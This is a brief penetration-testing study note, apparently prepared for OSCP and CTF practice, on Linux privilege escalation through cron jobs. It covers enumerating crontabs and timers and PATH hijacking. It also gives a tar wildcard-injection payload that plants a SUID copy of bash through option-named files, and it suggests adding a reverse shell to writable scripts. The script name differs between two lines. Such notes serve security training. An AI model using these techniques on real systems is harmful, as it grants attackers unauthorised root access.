// notes/ PrivEsc — Linux
🐧

Cron Jobs

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs" %}

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/cron-jobs

Cron jobs

{% embed url="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs" %}

Read the cron jobs then read permissions on any scripts running

code
01cat /etc/crontab

{% hint style="info" %} In CTF situations, if there are any custom scripts as cron jobs they're most likely there for a reason, especially ones running as root. {% endhint %}

Systemd timers could aslo be running which essentially do the same thing

code
01systemctl list-timers --all

Cron Paths

If the path of the script isn't a the full file path it will check the first path in the PATH variable for it first

{% embed url="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUczSr73L34emqNMDOxDg%2Fuploads%2F15vVZIEpvXFIyeHYu5Uy%2Fimage.png?alt=media&token=06b19b4e-eb0f-43e4-acbd-48f53d6620a8" %}

Cron Wildcards

If we only have read permissions on a script but it is using a wildcard with another command, we can make that command run something malicious instead

{% embed url="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUczSr73L34emqNMDOxDg%2Fuploads%2Fc3zqe2PjtUiuKhVR3O3l%2Fimage.png?alt=media&token=558a2848-e5d2-4320-bd46-278537ee8ecd" %}

With tar specifically we can make it run a script using touch and checkpoints

<pre><code>echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > privme.sh <strong>touch -- "--checkpoint=1" </strong>touch -- "--checkpoint-action=exec=sh privmeme.sh" </code></pre>

Cron File Overwrites

Check the file permissions on the scheduled script and add a reverse shell to it